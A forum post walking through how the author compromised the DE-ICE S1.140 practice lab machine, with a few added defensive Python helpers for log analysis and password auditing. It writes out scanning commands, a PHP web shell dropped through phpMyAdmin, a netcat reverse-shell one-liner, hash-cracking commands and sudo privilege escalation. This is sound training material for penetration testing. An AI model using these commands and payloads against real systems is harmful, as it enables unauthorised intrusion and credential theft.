Post Mon Jan 06, 2014 9:16 am

DE-ICE S1.140 Walkthrough

Below is a quick walkthrough on how I solved the DE-ICE S1.140 vulnerable machine that can be downloaded here.

Many thanks to Michael N. and Patrick B for putting this together, it really was fairly close to a real-world scenario.

Tools required

To solve this challenge you will need the following:
1. Kali Linux (or another suitable platform)
2. A copy of the darkc0de.lst wordlist, which can be downloaded from http://www.filecrop.com/darkc0de.lst.html

Scenario
You have been employed by 'LazyAdmin Corp' to pen test their network. You have gained a footing in the organisation and now you're looking to extract some sensitive information. You've determined that this information is held on one of their servers, and now you're attempting to break into that server to extract it.





Step 1 - Finding the Machine

When first fired up, the DE-ICE S1.140 machine acquires an IP address via DHCP. So the first step is finding it. My network automatically leased addresses in the 10.20.30.0/24 range out to clients, so I know it's on that network somewhere.

  Code:
nmap -n -sn 10.20.30.0/24


Image

It appears as though 10.20.30.3 is the one I want (I already know what the other machines are).





Step 2 - Port and Service Scanning

OK, the next step is to find out which ports are open on the machine, and hopefully which services are listening on those ports. Time to fire up the trusty nmap.

  Code:
nmap -sS -n -A -p- 10.20.30.3


Image

Nmap tells me the following ports are open:


21/tcp - FTP - Anonymous logins allowed
22/tcp - SSH
80/tcp - http Webserver
443/tcp - https Webserver
993/tcp - POP3S
995/tcp - IMAPS


OK, so it looks like there are FTP, SSH, a webserver and a mailserver running.





Step 3 - Exploring FTP

As anonymous FTP access is allowed, that will be the first port of call. A quick poke around shows us that there is a folder called 'incoming', but that only members of the ftp group have read access into it. A quick file upload shows that we can write into the folder, but read nothing from it. We'll come back to this later on.

Image



Step 4 - Exploring the HTTP Webserver

Firing up a browser and pointing it at the IP address of the DE-ICE S1.140 machine gives us an HTML page which explains what we have to do.

Image

Seeing an HTML page usually smacks of something else being hosted on the webserver, so let's fire up dirBuster and have a look.

Image

dirBuster tells us that there is a forum being hosted on the webserver as well.

Image

  Code:
http://10.20.30.3/forum/


A quick look around the forum shows the following things:

1. There are four users of the forum (admin, mbrown, rhedley, swillard)
2. The SWillard user used to be called SRaines
3. There is a large post entitled "Login Attacks" by MBrown that looks like it's an SSH log dump

Image
Image


Let's take a closer look at that SSH log. It looks like someone was attempting to brute-force their way onto one of the Lazy Admin Corp servers, trying various usernames and passwords, all of them failing. If we look closer, though, we can see that one of the login attempts succeeded.

Image

The mbrown user successfully logged into this machine from the IP address 10.0.0.23. If we search for all logins to this machine from this IP address, we turn up another entry in the log, !DFiuoTkbxtdk0!, that looks suspiciously like a password.

Image

It looks like MBrown made the common mistake of typing their password into the username field, and then immediately attempted to log in again with the correct details.
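The pattern above (a password mistyped into the username field, followed by a successful login from the same address) is something a defender can pick out of sshd logs automatically. The following is an added example, not part of the original post, that runs over constructed auth.log lines; the log content, host name, IPs and the odd "username" value are all made up for the example.

```python
import re
from datetime import datetime

# Constructed sshd log lines in syslog format. The "Invalid user" value on the
# second line is a made-up string standing in for a password typed into the
# login field; it is not a real credential.
SAMPLE_LOG = """\
Jan  5 10:01:02 webhost sshd[2201]: Failed password for invalid user guest from 10.0.0.23 port 51234 ssh2
Jan  5 10:01:09 webhost sshd[2203]: Invalid user Zq8!vL#2pm from 10.0.0.23
Jan  5 10:01:15 webhost sshd[2205]: Accepted password for mbrown from 10.0.0.23 port 51240 ssh2
Jan  5 10:03:40 webhost sshd[2210]: Invalid user oracle from 203.0.113.9
Jan  5 10:03:41 webhost sshd[2210]: Failed password for invalid user oracle from 203.0.113.9 port 40001 ssh2
"""

# Only the two message types we need: rejected unknown usernames and accepted logins.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?:Invalid user (?P<bad>\S+) from (?P<bad_ip>\S+)"
    r"|Accepted \w+ for (?P<ok>\S+) from (?P<ok_ip>\S+))"
)
# A plausible Unix account name; anything else in the username field is suspicious.
NORMAL_USER_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def parse_ts(text):
    # Syslog timestamps carry no year; only the difference between two is used.
    return datetime.strptime(text, "%b %d %H:%M:%S")


def find_leaked_credentials(log_text, window_seconds=120):
    """Return (ip, leaked_value, accepted_user) triples: an "Invalid user" value
    that does not look like an account name, followed within the window by a
    successful login from the same source IP. Each hit is a password that now
    sits in the logs and should be rotated."""
    pending = {}      # source ip -> [(timestamp, suspicious username), ...]
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = parse_ts(m.group("ts"))
        if m.group("bad") is not None:
            if not NORMAL_USER_RE.match(m.group("bad")):
                pending.setdefault(m.group("bad_ip"), []).append((ts, m.group("bad")))
        else:
            ip = m.group("ok_ip")
            for when, value in pending.pop(ip, []):
                if (ts - when).total_seconds() <= window_seconds:
                    findings.append((ip, value, m.group("ok")))
    return findings
```

Running it over the sample yields one finding: the odd value from 10.0.0.23 followed six seconds later by mbrown's successful login.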

Before we go exploring any further, let's have a look at the HTTPS service.





Step 5 - Exploring the HTTPS Webserver

Time to fire up the trusty dirBuster again, this time against the HTTPS port. dirBuster tells us that there are another two services available, webmail and phpMyAdmin.

Image





Step 6 - Using MBrown's credentials

The first place to try MBrown's credentials is the forum. They work, allowing us to log in. We don't appear to have the rights to do anything here (such as upload files), however we can get into our own profile, which gives us the following information:

1. The user's full name is Mark Brown
2. The user's email address is mb@lazyadmin.corp

Image

The second place to try MBrown's credentials is the webmail service. We log in here with the same password as the forum, but with the email address of mb@lazyadmin.corp as our username.

Image

Success! This lands us two emails. The first is an email from Sandy Willard (sw@lazyadmin.corp) telling Mark Brown that he appears to be reusing credentials in multiple locations (yep, she's right).

Image

The second email gives us the root login credentials for a MySQL server.
  Code:
Username: root
Password: S4!y.dk)j/_d1pKtX1


Image





Step 7 - Logging into phpMyAdmin

We can now log into the phpMyAdmin site using the credentials in MBrown's email.

Image

This hosts the databases for the webmail and the forum. The following tables contain the password hashes for each service:

Image

Forum:
  Code:
forum/mlf2_userdata


  Code:
SELECT user_name,user_real_name,user_pw FROM forum.mlf2_userdata


Webmail:
  Code:
mail/mailbox


  Code:
SELECT username,password,name,maildir FROM mail.mailbox


We'll record these for cracking later.





Step 8 - Getting a shell on the box

Now that we have phpMyAdmin access, we can get a shell on the box, but first we need to find a directory that we can write to and also access from the website.

As the webserver is running the mylittleforum software, this is a good place to start our hunt. A quick Google search turns up a possible location in the very first link.

https://www.google.com/search?q=mylittleforum+writable

"...the write permission of the subdirectory templates_c (CHMOD 770, 775 or 777) might need to be changed in order that they are writable"

Can we access this directory from the webserver? Yes we can!

Image

  Code:
http://10.20.30.3/forum/templates_c/


From the phpMyAdmin page, let's create a table to hold our shell.

  Code:
CREATE TABLE `test`.`phpshell` (`track1` VARCHAR( 1000 ) NOT NULL ) ENGINE = MYISAM;


Now let's create a quick shell to go in that table.

  Code:
insert into phpshell values
("
<?php
if(isset($_REQUEST['cmd'])){
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        die;
}
?>
");


We now have to guess where the forum is actually hosted on the server. Chances are it's in the default location of /var/www/, so let's try that first.

  Code:
select * into dumpfile '/var/www/forum/templates_c/phpbackdoor.php' from phpshell


If everything has gone well, we should be able to call the phpshell with the following URL:
  Code:
http://10.20.30.3/forum/templates_c/phpbackdoor.php?cmd=whoami


Image

Well, the good news is that our PHP code has been uploaded, but the bad news is that the webserver is running as the low-level apache user.

Time to get a real shell on the machine. First we create a named pipe to send data in and out of.

  Code:
http://10.20.30.3/forum/templates_c/phpbackdoor.php?cmd=mknod /var/www/forum/templates_c/backpipe p


Next we set up a netcat listener on our local Kali machine.

  Code:
nc -l -p 444


And finally we set up a reverse connection from the DE-ICE machine to our Kali machine.

  Code:
http://10.20.30.3/forum/templates_c/phpbackdoor.php?cmd=/bin/sh -c "/bin/bash 0</var/www/forum/templates_c/backpipe | nc 10.20.30.5 444 1>/var/www/forum/templates_c/backpipe"


Image

Success! We now have a very limited shell on the DE-ICE machine. We can now spawn a slightly better shell which will allow us to migrate to other users.

  Code:
python -c 'import pty;pty.spawn("/bin/bash")'






Step 9 - Cracking the hashes

We've now got a low-privileged user on the machine, but we need access to a higher-privileged one. Time to crack the hashes we obtained earlier from the forum and webmail tables in the MySQL database.

First up are the webmail hashes. These look like plain MD5 hashes, so let's put them in the following format and let John the Ripper have a crack at them with the darkc0de wordlist.

  Code:
Username:Hash

  Code:
john --format=raw-md5 --wordlist=darkc0de.lst webmailhashes


Note: when you want john to display the results of cracking these hashes, you need to specify --format=raw-md5 as well, otherwise they won't be displayed.

Image

Success! We learn the following passwords:


    RHedley - tum-ti-tum
    SWillard - Austin-Willard


Time for the forum hashes. John the Ripper doesn't have a clue what format these are in, and Google doesn't help much either, so the hashes must be stored in an unusual format. Luckily, the forum software is open source, so we can find out how it generates the hashes.

A bit of searching around shows us that the password functions are in the 'functions.inc.php' file within the software:
http://sourceforge.net/p/mylittleforum/code/ci/master/tree/includes/functions.inc.php

Specifically, we can reverse engineer the 'is_pw_correct' function to find out what happens when a user enters their password. The code of this function is below:

  Code:
function is_pw_correct($pw,$hash)
{
    if(strlen($hash)==50) // salted sha1 hash with salt
    {
        $salted_hash = substr($hash,0,40);
        $salt = substr($hash,40,10);
        if(sha1($pw.$salt)==$salted_hash) return true;
        else return false;
    }
    elseif(strlen($hash)==32) // md5 hash generated in an older version
    {
        if($hash == md5($pw)) return true;
        else return false;
    }
    else return false;
}


Our password hashes are 50 characters in length, so they're salted SHA1 hashes. The salt forms the last 10 characters of the stored value, and the SHA1 hash itself is the first 40 characters.
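To make the layout concrete, here is an added Python example (mine, not code from the mylittleforum project) that mirrors the is_pw_correct logic above, splits a stored value into the <HASH>:<SALT> form used in the next step, and audits a set of mlf2_userdata rows against a wordlist the way a forum admin checking for weak or reused passwords would. The make_hash, to_hashcat_line and audit function names are my own, and all hashes it checks are constructed inside the block.

```python
import hashlib
import secrets


def is_pw_correct(pw, stored):
    """Python equivalent of mylittleforum's is_pw_correct():
    50 chars = sha1(pw + salt) followed by the 10-char salt,
    32 chars = legacy unsalted md5, anything else is rejected."""
    if len(stored) == 50:
        salted_hash, salt = stored[:40], stored[40:]
        return hashlib.sha1((pw + salt).encode()).hexdigest() == salted_hash
    if len(stored) == 32:
        return hashlib.md5(pw.encode()).hexdigest() == stored
    return False


def make_hash(pw, salt=""):
    """Build a stored value in the same 50-char layout (used here only to
    construct test data; a random 10-hex-char salt is generated if none given)."""
    salt = salt or secrets.token_hex(5)
    return hashlib.sha1((pw + salt).encode()).hexdigest() + salt


def to_hashcat_line(stored):
    """Split a 50-char forum value into the <HASH>:<SALT> line that
    hashcat -m 110 (sha1($pass.$salt)) expects."""
    if len(stored) != 50:
        raise ValueError("not a salted mylittleforum hash")
    return stored[:40] + ":" + stored[40:]


def audit(rows, wordlist):
    """Return {user_name: password} for every account whose stored hash
    verifies against a wordlist entry. rows are (user_name, user_pw) pairs
    as returned by SELECT user_name,user_pw FROM forum.mlf2_userdata.
    One plain SHA1 per guess is all it costs, which is why an unsalted or
    lightly salted fast hash offers little protection against a wordlist."""
    weak = {}
    for user, stored in rows:
        for candidate in wordlist:
            if is_pw_correct(candidate, stored):
                weak[user] = candidate
                break
    return weak
```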

Let's create a file with the hashes in the following format:

  Code:
<HASH>:<SALT>


John the Ripper still can't deal with these types of hashes, but the hashcat tool can:

  Code:
hashcat -m 110 forum_passwords darkc0de.lst


Image

Success! We've obtained another password. Although it's one we've already got, it shows that users are using the same password for multiple services.

    RHedley - tum-ti-tum


Time to try out these passwords directly on the shell we have on the DE-ICE machine.





Step 10 - Obtaining the FTP Backup and Backup Script

Using the passwords we've cracked, let's try to escalate our privileges on the DE-ICE system. The SWillard password (Austin-Willard) doesn't appear to have been reused (well done Sandy), but the RHedley one (tum-ti-tum) does.

  Code:
su - rhedley


Looking around the filesystem, we find that we now have read access to the /home/ftp/incoming folder, as rhedley is a member of the ftpadmin group. In here we find a file that looks like an encrypted backup of the host. Let's move this to our Kali machine for later on, via the templates_c folder we were using earlier.

Image

  Code:
cp /home/ftp/incoming/backup_webhost_130111.tar.gz.enc /var/www/forum/templates_c/backup_webhost_130111.tar.gz.enc && chmod 666 /var/www/forum/templates_c/backup_webhost_130111.tar.gz.enc


We also find a file called "backup.sh" in the /opt/ directory. This is protected by extended ACLs so normal users cannot read it, but members of the ftpadmin group have been granted read permission. This can be verified with the following command:

  Code:
getfacl /opt/backup.sh


This file contains the encryption type and password used for encrypting the FTP backup.

Using these two files we can decrypt the backup file on our Kali machine:

  Code:
openssl aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -d -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs


Now that we have a decrypted archive, it's just a matter of extracting it.

  Code:
tar -zxvf backup_webhost_130111.tar.gz






Step 11 - Cracking the Shadow file

Looking around inside the backup, there are two files that jump out, the passwd file and the shadow file.

Image

Time to put John the Ripper to use again to see if we can pull out any more interesting passwords.

  Code:
unshadow webhost/etc/passwd webhost/etc/shadow > unshadowed

  Code:
john --wordlist=darkc0de.lst unshadowed --format=sha512crypt


Image

Aha! We have the password for the sraines user: brillantissimo.

But who is the sraines user? They don't exist on the DE-ICE system. Remember back when we first started, though: someone mentioned on the forum that they got married and changed their last name from Raines to Willard...





Step 12 - Stealing the Secrets

The first step is finding out what permissions SWillard has on the DE-ICE machine.

Image

  Code:
sudo -l


It seems as though SWillard has the ability to run anything they like, so let's get some root privileges.

  Code:
sudo su -


Now that we're the root user, it's time to have a look around. The typical place to store information you want only root to have access to is the /root/ directory, so let's have a look there first.

Image

We find a file called secret.jpg, which looks very suspicious. If we open it up...?

Cake!

Image